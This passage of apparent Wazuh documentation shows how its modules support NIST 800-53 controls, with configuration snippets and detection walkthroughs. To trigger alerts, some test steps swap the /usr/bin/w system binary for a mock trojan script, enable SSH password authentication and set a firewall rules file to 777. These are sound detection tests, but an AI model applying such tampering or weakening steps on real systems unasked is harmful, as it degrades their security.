  • AU-6 Audit record review, analysis, and reporting: “Audit record review, analysis, and reporting covers information security and privacy-related logging performed by organizations, including logging that results from the monitoring of account usage, remote access, wireless connectivity, mobile device connection, configuration settings, system component inventory, use of maintenance tools and non-local maintenance, physical access, temperature and humidity, equipment delivery and removal, communications at system interfaces, and use of mobile code or Voice over Internet Protocol (VoIP). Findings can be reported to organizational entities that include the incident response team, help desk, and security or privacy offices. If organizations are prohibited from reviewing and analyzing audit records or unable to conduct such activities, the review or analysis may be carried out by other organizations granted such authority. The frequency, scope, and/or depth of the audit record review, analysis, and reporting may be adjusted to meet organizational needs based on new information received.”

  • CA-7 Continuous monitoring: “Continuous monitoring at the system level facilitates ongoing awareness of the system security and privacy posture to support organizational risk management decisions. The terms continuous and ongoing imply that organizations assess and monitor their controls and risks at a frequency sufficient to support risk-based decisions. Different types of controls may require different monitoring frequencies. The results of continuous monitoring generate risk response actions by organizations. When monitoring the effectiveness of multiple controls that have been grouped into capabilities, a root-cause analysis may be needed to determine the specific control that has failed. Continuous monitoring programs allow organizations to maintain the authorizations of systems and common controls in highly dynamic environments of operation with changing mission and business needs, threats, vulnerabilities, and technologies. Having access to security and privacy information on a continuing basis through reports and dashboards gives organizational officials the ability to make effective and timely risk management decisions, including ongoing authorization decisions.”

The Wazuh dashboard module provides dashboards for continuously monitoring and reviewing security incidents and generating reports of security and audit events. The Wazuh dashboard and its NIST 800-53 module help you meet the above NIST 800-53 controls.

Use cases
Generate a report of successful authentications

This use case shows how Wazuh helps meet the CA-7 Continuous monitoring NIST requirement by providing security reporting to administrators. Use the Wazuh dashboard to generate a report of all successful authentications in the last 24 hours:

  1. Go to the Wazuh dashboard menu and select Discover under Explore.

    Select Discover
  2. Add a filter for the authentication_success rule group and click Save.

    Add a filter
  3. Save the results of the search using any name of your choice.

    Save the results
    Save search
  4. Select Reporting, then choose Generate CSV. This downloads a report of all successful authentication events as a CSV file for your review.

    Select Reporting
Review NIST 800-53 alerts

In this use case, Wazuh assists security administrators in meeting the AU-6 Audit record review, analysis, and reporting requirement by providing a NIST 800-53 compliance dashboard.

  1. Select the NIST 800-53 module from your Wazuh dashboard.

    Select the NIST 800-53 module
  2. Select the Events tab to see all alerts related to NIST 800-53 controls.

    Select the Events tab
  3. Select the Controls tab to view available control requirements.

    The Controls section of the NIST 800-53 compliance dashboard shows the various NIST 800-53 controls and the related events. For ease of navigation, the Wazuh dashboard groups events according to the NIST 800-53 control they meet or violate.

    Select the Controls tab
    Recent events

Log data analysis

The Wazuh log data analysis module collects and analyzes logs from various sources, such as applications, systems, network devices, and cloud workloads. This data helps in resource monitoring, threat detection, and incident response.

The Wazuh Log data analysis module helps comply with the following NIST 800-53 controls:

  • IA-4 Identifier management: “Common device identifiers include Media Access Control (MAC) addresses, Internet Protocol (IP) addresses, or device-unique token identifiers. The management of individual identifiers is not applicable to shared system accounts. Typically, individual identifiers are the usernames of the system accounts assigned to those individuals. In such instances, the account management activities of AC-2 use account names provided by IA-4. Identifier management also addresses individual identifiers not necessarily associated with system accounts. Preventing the reuse of identifiers implies preventing the assignment of previously used individual, group, role, service, or device identifiers to different individuals, groups, roles, services, or devices.”

  • SI-4 System monitoring: “System monitoring includes external and internal monitoring. External monitoring includes the observation of events occurring at external interfaces to the system. Internal monitoring includes the observation of events occurring within the system. Organizations monitor systems by observing audit activities in real-time or by observing other system aspects such as access patterns, characteristics of access, and other actions. The monitoring objectives guide and inform the determination of the events. System monitoring capabilities are achieved through a variety of tools and techniques, including intrusion detection and prevention systems, malicious code protection software, scanning tools, audit record monitoring software, and network monitoring software.”

The above NIST 800-53 controls require you to monitor system activities in your organization. Analysis of these activities helps you keep track of security incidents and occurrences within your infrastructure. The Wazuh log data analysis module analyzes logs and generates alerts when it detects suspicious activities.

Use case: Failed authentication attempts on a Windows endpoint

This use case shows how Wazuh helps meet the IA-4 Identifier management requirement by using the IP address label as an example identifier. In this scenario, Wazuh detects failed login attempts on a monitored Windows 10 endpoint.

  1. Enable RDP on the Windows 10 endpoint. Select Start > Settings > System > Remote Desktop, and turn on Enable Remote Desktop. Please note that some Windows versions might not support Remote Desktop.

  2. Open the Remote Desktop Connection application from another Windows endpoint on the same network. Perform five failed login attempts against the monitored Windows endpoint. .

    Open the Remote Desktop
  3. Expand one of the rule ID 60204 alerts on the Wazuh dashboard. This allows finding more information about the multiple logon failure event. For example, target username, device identifiers such as source IP address, and the NIST 800-53 control the event is related to.

    Expand an alert on the Wazuh dashboard

Security configuration assessment

The Wazuh Security Configuration Assessment (SCA) module performs scans to determine if monitored endpoints meet secure configuration and hardening policies. These scans assess the endpoint configuration using policy files. These policy files contain rules that serve as a benchmark for the configurations that exist on the monitored endpoint.

The Wazuh SCA helps to comply with the following NIST 800-53 controls:

  • SC-7 Boundary protection: “Managed interfaces include gateways, routers, firewalls, guards, network-based malicious code analysis, virtualization systems, or encrypted tunnels implemented within a security architecture. Subnetworks that are physically or logically separated from internal networks are referred to as demilitarized zones or DMZs. Restricting or prohibiting interfaces within organizational systems includes restricting external web traffic to designated web servers within managed interfaces, prohibiting external traffic that appears to be spoofing internal addresses, and prohibiting internal traffic that appears to be spoofing external addresses. SP 800-189 provides additional information on source address validation techniques to prevent ingress and egress of traffic with spoofed addresses. Commercial telecommunications services are provided by network components and consolidated management systems shared by customers. These services may also include third-party-provided access lines and other service elements. Such services may represent sources of increased risk despite contract security provisions. Boundary protection may be implemented as a common control for all or part of an organizational network such that the boundary to be protected is greater than a system-specific boundary (i.e., an authorization boundary).”

  • IA-5 Authenticator management: “Authenticators include passwords, cryptographic devices, biometrics, certificates, one-time password devices, and ID badges. Device authenticators include certificates and passwords. Initial authenticator content is the actual content of the authenticator (e.g., the initial password). In contrast, the requirements for authenticator content contain specific criteria or characteristics (e.g., minimum password length). Developers may deliver system components with factory default authentication credentials (i.e., passwords) to allow for initial installation and configuration. Default authentication credentials are often well-known, easily discoverable, and present a significant risk. The requirement to protect individual authenticators may be implemented via control PL-4 or PS-6 for authenticators in the possession of individuals and by controls AC-3, AC-6, and SC-28 for authenticators stored in organizational systems, including passwords stored in hashed or encrypted formats or files containing encrypted or hashed passwords accessible with administrator privileges.”

  • CM-6 Configuration settings: “Configuration settings are the parameters that can be changed in the hardware, software, or firmware components of the system that affect the security and privacy posture or functionality of the system. Information technology products for which configuration settings can be defined include mainframe computers, servers, workstations, operating systems, mobile devices, input/output devices, protocols, and applications. Parameters that impact the security posture of systems include registry settings; account, file, or directory permission settings; and settings for functions, protocols, ports, services, and remote connections.”

Wazuh has out-of-the-box SCA policies to check if endpoints meet authentication, network, and boundary policies, among other security policies. The Wazuh SCA module scans endpoints regularly to determine if they comply with specific security policies.

Use case: Ensure default deny firewall policy and SCA scan

This use case shows how Wazuh helps meet the CM-6 Configuration settings requirement by ensuring endpoint compliance with the CIS configuration benchmark. In this scenario, Wazuh runs default SCA checks to determine the default firewall deny policy status on an Ubuntu 22.04 endpoint.

  1. Restart the Wazuh agent to trigger a new SCA scan.

    # systemctl restart wazuh-agent
    
  2. Select the Configuration Assessment module on your Wazuh dashboard. SCA scans are enabled by default so you don’t require further configuration actions.

    Select the SCA module
  3. Select the endpoint running the Wazuh agent.

    Select the endpoint
  4. Select CIS benchmark for Ubuntu Linux 22.04 LTS.

    Select CIS benchmark

    This scan helps ensure that the endpoint complies with security policies and hardening configurations. CIS Benchmark for Ubuntu Linux 22.04 LTS shows the results of the SCA checks (passed, failed, and not applicable) and the time of the last scan, as shown above.

  5. Navigate to ID 28577.

    Navigate to ID 28577

    This SCA check returns Failed if the default firewall policy on the endpoint is configured. Additionally, each SCA check contains the reason for performing the check, a description, and possible remediation for the failed SCA check.

Malware detection

Wazuh offers several capabilities that support malware detection. The Malware detection module uses the following integrations and methods to detect malicious activities on a monitored endpoint:

  • File integrity monitoring and threat detection rules.

  • Rootkit behavior detection rules.

  • CDB lists and threat intelligence to detect and remove malicious files.

  • VirusTotal integration for malware detection.

  • File integrity monitoring and YARA scans for malware detection.

  • Custom rules to detect malware IOC.

  • ClamAV logs collection.

  • Windows Defender logs collection.

These Malware detection components of Wazuh help you comply with the following NIST 800-53 controls:

  • SI-3 Malicious code protection: “Malicious code protection mechanisms include both signature and non-signature-based technologies. Non-signature-based detection mechanisms include artificial intelligence techniques that use heuristics to detect, analyze, and describe the characteristics or behavior of malicious code and to provide controls against such code for which signatures do not yet exist or for which existing signatures may not be effective. Such malicious code includes polymorphic malicious code (i.e., code that changes signatures when it replicates). Non-signature-based mechanisms also include reputation-based technologies. In addition to the above technologies, pervasive configuration management, comprehensive software integrity controls, and anti-exploitation software may be effective in preventing the execution of unauthorized code. Malicious code may be present in commercial off-the-shelf software as well as custom-built software and could include logic bombs, backdoors, and other types of attacks that could affect organizational mission and business functions.”

  • SI-7 Software, firmware, and information integrity: “Unauthorized changes to software, firmware, and information can occur due to errors or malicious activity. Software includes operating systems (with key internal components, such as kernels or drivers), middleware, and applications. Firmware interfaces include Unified Extensible Firmware Interface (UEFI) and Basic Input/Output System (BIOS). Information includes personally identifiable information and metadata that contains security and privacy attributes associated with information. Integrity-checking mechanisms-including parity checks, cyclic redundancy checks, cryptographic hashes, and associated tools-can automatically monitor the integrity of systems and hosted applications.”

The NIST 800-53 controls above require users to have tools and processes to detect malicious code and modified software and firmware. Wazuh supports the detection of suspicious system binaries, malware, and suspicious processes using out-of-the-box rules, VirusTotal and YARA integrations, and CDB lists. In addition, Wazuh also includes a File Integrity Monitoring module that allows users to continuously monitor specific files and paths that malware might use.

Use case: Detecting suspicious binaries

This use case shows how Wazuh meets the SI-3 Malicious code protection requirement by detecting a malicious binary on a monitored endpoint. In this scenario, the Wazuh rootcheck module is used to detect a trojan system binary on a Ubuntu 22.04 endpoint.

The Wazuh rootcheck module is enabled by default on the Wazuh agent configuration file. The rootcheck section explains the options in the rootcheck module.

  1. Create a copy of the original system binary:

    $ sudo cp -p /usr/bin/w /usr/bin/w.copy
    
  2. Replace the original system binary /usr/bin/w with the following shell script:

    $ sudo tee /usr/bin/w << EOF
    #!/bin/bash
    echo "`date` this is evil" > /tmp/trojan_created_file
    echo 'test for /usr/bin/w trojaned file' >> /tmp/trojan_created_file
    # Now running original binary
    /usr/bin/w.copy
    EOF
    
  3. Restart the Wazuh agent to see the relevant alert:

    $ sudo systemctl restart wazuh-agent
    
  4. Navigate to the Threat Hunting dashboard. Search for the event with rule ID 510.

    Threat Hunting dashboard
    Rule ID 510 event

The image above shows an example of a suspicious binary file detected on a monitored endpoint.

File integrity monitoring

The Wazuh File Integrity Monitoring (FIM) module monitors an endpoint filesystem to detect file changes in specified files and directories. It triggers alerts on file creation, modification, or deletion from the monitored paths. The FIM module compares the cryptographic checksum and other attributes of the monitored files and folders when a change occurs.

The Wazuh File Integrity Monitoring module assists you in meeting the following NIST 800-53 controls:

  • SC-28 Protection of information at rest: “Information at rest refers to the state of information when it is not in process or in transit and is located on system components. Such components include internal or external hard disk drives, storage area network devices, or databases. However, the focus of protecting information at rest is not on the type of storage device or frequency of access but rather on the state of the information. Information at rest addresses the confidentiality and integrity of information and covers user information and system information. System-related information that requires protection includes configurations or rule sets for firewalls, intrusion detection and prevention systems, filtering routers, and authentication information. Organizations may employ different mechanisms to achieve confidentiality and integrity protections, including the use of cryptographic mechanisms and file share scanning. Integrity protection can be achieved, for example, by implementing write-once-read-many (WORM) technologies. When adequate protection of information at rest cannot otherwise be achieved, organizations may employ other controls, including frequent scanning to identify malicious code at rest and secure offline storage in lieu of online storage.”

  • CM-3 Configuration changes control: “Configuration change control for organizational systems involves the systematic proposal, justification, implementation, testing, review, and disposition of system changes, including system upgrades and modifications. Configuration change control includes changes to baseline configurations, configuration items of systems, operational procedures, configuration settings for system components, remediate vulnerabilities, and unscheduled or unauthorized changes. Processes for managing configuration changes to systems include Configuration Control Boards or Change Advisory Boards that review and approve proposed changes. For changes that impact privacy risk, the senior agency official for privacy updates privacy impact assessments and system of records notices. For new systems or major upgrades, organizations consider including representatives from the development organizations on the Configuration Control Boards or Change Advisory Boards. Auditing of changes includes activities before and after changes are made to systems and the auditing activities required to implement such changes. See also SA-10.”

These NIST 800-53 controls require you to protect information at rest and monitor configuration changes in your infrastructure. The Wazuh FIM module helps you monitor the creation, modification, and deletion of files, directories, and Windows registry keys. This helps you meet the NIST 800-53 controls that require monitoring changes to files and folders.

Use cases
Detect SSH configuration changes

This use case shows how Wazuh helps meet the SC-28 Protection of information at rest requirement by providing file integrity monitoring on specified files and paths.

In this scenario, the Wazuh FIM monitors the SSH configuration file /etc/ssh/sshd_config on an Ubuntu 22.04 endpoint to detect changes in the SSH configuration. Monitor the SSH configuration file for changes using the steps below:

  1. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf. This monitors the /etc/ssh/sshd_config file for changes:

    <directories report_changes="yes" realtime="yes">/etc/ssh/sshd_config</directories>
    
  2. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  3. Change the PasswordAuthentication option in the /etc/ssh/sshd_config file from no to yes to create a change in the SSH configuration:

    # sed -re 's/^(PasswordAuthentication)([[:space:]]+)no/\1\2yes/' -i.`date -I` /etc/ssh/sshd_config
    
  4. Select the File Integrity Monitoring module from the Wazuh dashboard. Find the alert triggered by rule ID 550. The alert details show that the content of /etc/ssh/sshd_config has changed. They include the differences in the file checksum, the modification time, and other information.

    File Integrity Monitoring module
Detecting change actors to UFW firewall rules using who-data

This use case shows how Wazuh helps meet the CM-3 Configuration changes control requirement by providing extra audit data on triggered events for monitoring system configuration changes.

In this scenario, the Wazuh FIM monitors the Uncomplicated Firewall (UFW) rule files in the /etc/ufw/ directory on an Ubuntu 22.04 endpoint. Using who-data, you can get more information like the user, program, or process that made changes to a monitored file or folder. Perform the steps below to monitor and detect changes to the UFW rule files:

  1. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf . This monitors all UFW rule files for changes:

    <directories report_changes="yes" whodata="yes">/etc/ufw/</directories>
    

    UFW stores its rule files in the /etc/ufw/ directory, and all rule files have the extension .rules. We use the configuration above to monitor the modification, addition, and deletion of any files in the /etc/ufw/ directory.

  2. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  3. Modify the permissions for an existing rule file, user.rules, in the /etc/ufw directory to create a change to the UFW rule files:

    # sudo chmod 777 /etc/ufw/user.rules
    
  4. Check the alert of rule ID 550 on the Wazuh dashboard. This alert shows permissions for the /etc/ufw/user.rules file have changed.

    Alert of rule ID 550
  5. Expand the alert to view the full_log field. This field shows an overview of the event.

    The full_log field
  6. Check the syscheck.audit.login_user.name and syscheck.audit.process.name fields to see the user and process that initiated the change.

    Check syscheck fields

System inventory

The Wazuh Syscollector module gathers system resource information from each monitored endpoint. The information gathered includes hardware details, OS information, network details, and running processes. The Wazuh agent runs periodic scans on the endpoint and constantly updates the appropriate system information. The Wazuh Syscollector module helps to meet the following NIST 800-53 controls:

  • CM-7 Least functionality: “Systems provide a wide variety of functions and services. Some of the functions and services routinely provided by default may not be necessary to support essential organizational missions, functions, or operations. Additionally, it is sometimes convenient to provide multiple services from a single system component, but doing so increases risk over limiting the services provided by that single component. Where feasible, organizations limit component functionality to a single function per component. Organizations consider removing unused or unnecessary software and disabling unused or unnecessary physical and logical ports and protocols to prevent unauthorized connection of components, transfer of information, and tunneling. Organizations employ network scanning tools, intrusion detection and prevention systems, and end-point protection technologies, such as firewalls and host-based intrusion detection systems, to identify and prevent the use of prohibited functions, protocols, ports, and services. Least functionality can also be achieved as part of the fundamental design and development of the system (see SA-8, SC-2, and SC-3).”

  • CM-8 System component inventory: “System components are discrete, identifiable information technology assets that include hardware, software, and firmware. Organizations may choose to implement centralized system component inventories that include components from all organizational systems. In such situations, organizations ensure that the inventories include system-specific information required for component accountability. The information necessary for effective accountability of system components includes the system name, software owners, software version numbers, hardware inventory specifications, software license information, and for networked components, the machine names and network addresses across all implemented protocols (e.g., IPv4, IPv6). Inventory specifications include date of receipt, cost, model, serial number, manufacturer, supplier information, component type, and physical location.”

The NIST 800-53 controls above require you to maintain an inventory of system components, including ports, protocols, applications, and services, and their authorized usage. The CM-7 Least functionality requirement specifies that you must permit only a minimum useful set of features necessary for software or systems functioning. The Wazuh Syscollector module helps to meet an aspect of this control by providing detailed information on processes, packages, and ports that run on a monitored endpoint.

Use case: Inventory of applications installed on a Windows endpoint

This use case shows how Wazuh helps meet the NIST CM-8 System component inventory by providing a module for system inventory.

Using the Wazuh Syscollector module for this use case, you can see all packages installed on a monitored Windows endpoint. You can find this information on the Wazuh dashboard for the specific agent.

  1. Restart the Wazuh agent to trigger a new system inventory scan.

    > Restart-Service -Name wazuh
    
  2. Go to IT Hygiene on the Wazuh dashboard and select your endpoint.

    Inventory data

The Wazuh Syscollector module runs all available scans once every twelve hours by default in all compatible operating systems.

Vulnerability detection

The Wazuh Vulnerability Detection module performs a software audit. It identifies vulnerabilities in the operating system and installed applications in monitored endpoints. The module queries our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and the vulnerabilities repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability detection module correlates this information with data from the endpoint application inventory.

The Vulnerability Detection module helps to implement the following NIST 800-53 controls:

  • RA-5 Vulnerability monitoring and scanning: “Vulnerability monitoring includes scanning for patch levels; scanning for functions, ports, protocols, and services that should not be accessible to users or devices; and scanning for flow control mechanisms that are improperly configured or operating incorrectly. Vulnerability monitoring may also include continuous vulnerability monitoring tools that use instrumentation to continuously analyze components. Instrumentation-based tools may improve accuracy and may be run throughout an organization without scanning. Vulnerability monitoring tools that facilitate interoperability include tools that are Security Content Automation Protocol (SCAP)-validated. Thus, organizations consider using scanning tools that express vulnerabilities in the Common Vulnerabilities and Exposures (CVE) naming convention and that employ the Open Vulnerability Assessment Language (OVAL) to determine the presence of vulnerabilities. Sources for vulnerability information include the Common Weakness Enumeration (CWE) listing and the National Vulnerability Database (NVD). Control assessments, such as red team exercises, provide additional sources of potential vulnerabilities for which to scan. Organizations also consider using scanning tools that express vulnerability impact by the Common Vulnerability Scoring System (CVSS).”

  • SC-38 Operations security: “Operations security (OPSEC) is a systematic process by which potential adversaries can be denied information about the capabilities and intentions of organizations by identifying, controlling, and protecting generally unclassified information that specifically relates to the planning and execution of sensitive organizational activities. The OPSEC process involves five steps: identification of critical information, analysis of threats, analysis of vulnerabilities, assessment of risks, and the application of appropriate countermeasures. OPSEC controls are applied to organizational systems and the environments in which those systems operate. OPSEC controls protect the confidentiality of information, including limiting the sharing of information with suppliers, potential suppliers, and other non-organizational elements and individuals. Information critical to organizational mission and business functions includes user identities, element uses, suppliers, supply chain processes, functional requirements, security requirements, system design specifications, testing and evaluation protocols, and security control implementation details.”

The Wazuh Vulnerability Detection module assists with the above requirements by checking for vulnerable applications/packages and missing OS updates in an endpoint.

Use case: Detect vulnerabilities on a Windows endpoint

This use case shows how Wazuh helps meet the NIST RA-5 Vulnerability monitoring and scanning requirement using the Vulnerability detection module to identify system vulnerabilities.

In this use case, you make sure that a monitored Windows 10 endpoint is properly configured and the Wazuh Vulnerability detection module enabled. The Vulnerability Detection module of the Wazuh dashboard shows the result of the vulnerabilities detection.

Windows endpoint
  1. Check that the following highlighted options are within the syscollector wodle block of the /var/ossec/etc/ossec.conf file of your Wazuh agent:

    <!-- System inventory -->
       <wodle name="syscollector">
         <disabled>no</disabled>
         <interval>1h</interval>
         <scan_on_start>yes</scan_on_start>
         <hardware>yes</hardware>
         <os>yes</os>
         <network>yes</network>
         <packages>yes</packages>
         <ports all="no">yes</ports>
         <processes>yes</processes>
         <users>yes</users>
         <groups>yes</groups>
         <services>yes</services>
         <browser_extensions>yes</browser_extensions>
    
         <!-- Database synchronization settings -->
         <synchronization>
           <max_eps>10</max_eps>
           <integrity_interval>24h</integrity_interval>
         </synchronization>
       </wodle>
    
Wazuh server
  1. Edit the <vulnerability-detection> block within the /var/ossec/etc/ossec.conf file and make sure <enabled> is set to yes. This enables the vulnerability detection module.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
  2. If you made changes, restart the Wazuh server to apply them.

    # systemctl restart wazuh-manager
    
  3. Go to Vulnerability Detection > Inventory on the Wazuh dashboard. Select the Windows agent to find vulnerable applications and packages.

The alert details include the CVE number and severity, amongst other information.

Alert details

Active Response

The Wazuh Active Response module performs autonomous actions on endpoints to mitigate security threats. You can configure the module to automatically execute scripts when specific alerts trigger. These scripts execute actions, such as a firewall block or drop, traffic shaping or throttling, and account lockout.

The Wazuh Active Response module assists in meeting the following NIST 800-53 controls:

  • AC-7 Unsuccessful logon attempts: “The need to limit unsuccessful logon attempts and take subsequent action when the maximum number of attempts is exceeded applies regardless of whether the logon occurs via a local or network connection. Due to the potential for denial of service, automatic lockouts initiated by systems are usually temporary and automatically released after a predetermined, organization-defined time period. If a delay algorithm is selected, organizations may employ different algorithms for different components of the system based on the capabilities of those components. Responses to unsuccessful logon attempts may be implemented at the operating system and the application levels. Organization-defined actions that may be taken when the number of allowed consecutive invalid logon attempts is exceeded include prompting the user to answer a secret question in addition to the username and password, invoking a lockdown mode with limited user capabilities (instead of full lockout), allowing users to only logon from specified Internet Protocol (IP) addresses, requiring a CAPTCHA to prevent automated attacks, or applying user profiles such as location, time of day, IP address, device, or Media Access Control (MAC) address. If automatic system lockout or execution of a delay algorithm is not implemented in support of the availability objective, organizations consider a combination of other actions to help prevent brute force attacks. In addition to the above, organizations can prompt users to respond to a secret question before the number of allowed unsuccessful logon attempts is exceeded. Automatically unlocking an account after a specified period of time is generally not permitted. However, exceptions may be required based on operational mission or need.”

  • SC-5 Denial-of-service protection: “Denial-of-service events may occur due to a variety of internal and external causes, such as an attack by an adversary or a lack of planning to support organizational needs with respect to capacity and bandwidth. Such attacks can occur across a wide range of network protocols (e.g., IPv4, IPv6). A variety of technologies are available to limit or eliminate the origination and effects of denial-of-service events. For example, boundary protection devices can filter certain types of packets to protect system components on internal networks from being directly affected by or the source of denial-of-service attacks. Employing increased network capacity and bandwidth combined with service redundancy also reduces the susceptibility to denial-of-service events.”

The Wazuh Active Response module assists in meeting the above controls by responding to brute force and denial of service attacks. Wazuh includes out-of-the-box active response commands that drop traffic from a malicious IP address or disable a user account that is a victim of brute forcing.

Use case: Automatically disable an account

This use case shows how Wazuh helps meet the NIST AC-7 Unsuccessful logon attempts requirement by identifying and taking precautionary responses to failed login attempts.

In this scenario, the Wazuh Active Response module automatically disables a user account on a monitored Ubuntu 22.04 endpoint when events analysis detects multiple failed terminal login attempts. You can then track the alerts for these events and actions on the Wazuh dashboard.

Wazuh server
  1. Add the following configuration to the <ossec-config> block of the Wazuh server configuration file /var/ossec/etc/ossec.conf:

    <ossec-config>
      <active-response>
        <disabled>no</disabled>
        <command>disable-account</command>
        <location>local</location>
        <rules_id>5503</rules_id>
      </active-response>
    <ossec-config>
    
    • command: The active response script for the disable-account command disables a user account when triggered.

    • location: This specifies where to execute the active response command. The local option executes the script on the monitored endpoint where the event occurred.

    • rules_id: This active response script runs when an alert for rule ID 5503 is generated. Rule ID 5503 detects multiple failed terminal login attempts and generates alerts. You can define multiple rules by separating them with a comma.

  2. Restart the Wazuh server to apply the configuration changes:

    # systemctl restart wazuh-manager
    
Ubuntu endpoint
  1. Create two users for this use case:

    # useradd <USER1>
    # useradd <USER2>
    

    In our use case, <USER1> is kon, while <USER2> is jon.

  2. Attempt to log in with the wrong credentials to the <USER2> account using <USER1> account:

    <USER1>:$ su <USER2>
    

    The image below shows the related alerts on the Wazuh dashboard:

    Alerts on the Wazuh dashboard
    Users 1 and 2 alerts
  3. Check that the account was successfully locked using the passwd command on the Ubuntu endpoint:

    # passwd --status <USER2>
    
    jon L 11/24/2022 0 99999 7 -1
    

The L flag indicates the account is locked.

Threat intelligence

The Wazuh MITRE ATT&CK module provides you with threat intelligence capability. You can use it to gain further context on alerts in your environment. MITRE ATT&CK is a repository for information about attack tactics and techniques, and what to do to detect and mitigate them. The Wazuh MITRE ATT&CK module shows alerts that detail the threat actors, attack tactics, and techniques used in a security event. This module is helpful when an attack generates alerts and a user wants to know more about it. Refer to the MITRE ATT&CK framework for more details about MITRE mapping to rules.

The Wazuh threat intelligence capability helps to meet the following NIST 800-53 controls:

  • RA-10 Threat hunting: “Threat hunting is an active means of cyber defense in contrast to traditional protection measures, such as firewalls, intrusion detection and prevention systems, quarantining malicious code in sandboxes, and Security Information and Event Management technologies and systems. Cyber threat hunting involves proactively searching organizational systems, networks, and infrastructure for advanced threats. The objective is to track and disrupt cyber adversaries as early as possible in the attack sequence and to measurably improve the speed and accuracy of organizational responses. Indications of compromise include unusual network traffic, unusual file changes, and the presence of malicious code. Threat hunting teams leverage existing threat intelligence and may create new threat intelligence, which is shared with peer organizations, Information Sharing and Analysis Organizations (ISAO), Information Sharing and Analysis Centers (ISAC), and relevant government departments and agencies.”

  • PM-16 Threat awareness program: “Because of the constantly changing and increasing sophistication of adversaries, especially the advanced persistent threat (APT), it may be more likely that adversaries can successfully breach or compromise organizational systems. One of the best techniques to address this concern is for organizations to share threat information, including threat events (i.e., tactics, techniques, and procedures) that organizations have experienced, mitigations that organizations have found are effective against certain types of threats, and threat intelligence (i.e., indications and warnings about threats). Threat information sharing may be bilateral or multilateral. Bilateral threat sharing includes government-to-commercial and government-to-government cooperatives. Multilateral threat sharing includes organizations taking part in threat-sharing consortia. Threat information may require special agreements and protection, or it may be freely shared.”

The NIST 800-53 controls above require organizations to perform threat hunting and stay continuously updated about cyber threats and adversaries. Wazuh helps you meet these controls by mapping alerts to MITRE ATT&CK techniques and providing an intelligence dashboard for reviewing adversary tactics, techniques, software, and mitigations.

Use cases
Review MITRE ATT&CK techniques in your environment

In this use case, Wazuh helps meet the PM-16 Threat awareness program requirement by providing the MITRE ATT&CK module for threat information sharing. Review various MITRE ATT&CK techniques and see the events associated with those techniques in your environment. To perform this review, follow the steps below:

  1. Select the MITRE ATT&CK module on the Wazuh dashboard.

    MITRE ATT&CK module
  2. Select Framework. Here, you can see the available MITRE tactics and their associated techniques.

  3. Select any technique to display its details as well as the events in your environment associated with that technique. In this example, we choose T1112 Modify Registry.

    Select Framework
    T1112 Modify Registry

You can proceed to review the events for possible malicious activity.

Review intelligence on threat actors

In this use case, Wazuh helps meet the RA-10 Threat hunting requirement by providing a threat intelligence platform for threat hunters.

In this scenario, you review intelligence from MITRE about various threat actors, techniques, mitigations, and tools. Wazuh provides this information in the Intelligence section of the MITRE ATT&CK module. This review helps support the NIST PM-16 Threat awareness program control and keeps security administrators informed about threats. Follow the steps below to perform this review:

  1. Select the MITRE ATT&CK module from the Wazuh dashboard.

    MITRE ATT&CK module
  2. Select Intelligence. Here, you can see the available MITRE intelligence sections.

  3. Select Groups. Here, you can see the different threat groups identified by MITRE. In this use case, choose G0018.

    Select Groups

    You can see the group description, the software they use, and their associated techniques.

    Group description
    Associated techniques

Using Wazuh for TSC compliance

The American Institute of Certified Professional Accountants (AICPA) developed the SOC 2 reporting framework to provide organizations with a uniform method to assess and report on the efficacy of their information security policies. SOC 2 reports focus on the five trust service categories of security, availability, processing integrity, confidentiality, and privacy.

The Trust Services Criteria (TSC) created by the Assurance Services Executive Committee (ASEC) of the AICPA presents control evaluation benchmarks. These evaluation benchmarks include metrics for security, availability, processing integrity, confidentiality, and privacy of information and systems across an entire entity. These metrics also relate to granular aspects of the entity, such as a division, an operational procedure, or a particular type of information used by the entity. The AICPA defines the common criteria as a set of controls that apply to the five Trust Services Criteria categories.

  • The COSO Principles and Common Criteria

    The Committee of Sponsoring Organizations (COSO) internal control framework provides a systematic approach for organizations to manage risk and improve performance. It includes a detailed framework for evaluating and improving an entity's internal control structure.

    TSC common criteria (CC) provides a framework for assessing and certifying the security of information technology (IT) products and systems. It defines a set of security standards and evaluation guidelines that organizations can adopt to assess the security of IT products and systems.

    It's important to note that though both frameworks intersect, they are different. The TSC framework and COSO principles evaluate the effectiveness of an organization's internal controls and risk management processes. While the COSO principles prioritize the entity's overall internal control and risk management, the TSC common criteria focus primarily on the security of IT products and systems. It achieves this by providing a set of specific criteria for evaluating controls related to security, availability, processing integrity, confidentiality, and privacy.

    Providing security to IT products and systems is a key element in improving an entity's overall risk management strategy and internal control structure. These criteria focus on the logical and physical protection of information, systems, and networks. The common criteria (CC) are organized into nine subsections, which are:

    • CC1: Control environment

    • CC2: Communication and Information

    • CC3: Risk Management and Design and Implementation of Controls

    • CC4: Control Activities

    • CC5: Monitoring of Controls

    • CC6: Logical and Physical Access Controls

    • CC7: System Operations

    • CC8: Change Management

    • CC9: Risk Mitigation

    In summary, SOC 2, TSC, COSO, and CC are all frameworks and standards organizations use to manage risks and ensure the effectiveness of their internal controls. SOC 2 and TSC focus on the security, availability, processing integrity, confidentiality, and privacy of an organization's systems and services. COSO provides a broader framework for enterprise risk management and internal control, while CC offers a method for evaluating the security features of IT products and systems. Organizations may use a combination of these frameworks and standards to develop a comprehensive risk management and compliance strategy.

  • TSC additional criteria

